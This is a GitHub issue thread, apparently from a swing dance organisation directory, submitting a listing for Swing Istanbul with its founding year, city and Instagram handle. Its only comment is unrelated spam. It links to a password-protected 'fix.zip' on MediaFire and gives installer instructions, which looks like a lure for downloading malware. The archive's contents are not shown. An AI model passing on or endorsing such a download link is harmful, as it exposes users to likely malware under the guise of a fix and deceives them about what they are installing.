### ISSUE TITLE
[tr] Swing Istanbul

### ISSUE THREAD

**Issue by Kjuly** [swingdance/orgs#49]
### Region Code

tr

### Name

Swing Istanbul

### Year Established

2008

### City

Istanbul

### Province or State

Istanbul

### Specific Dance Style

ANY

### Instagram

swingistanbul

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
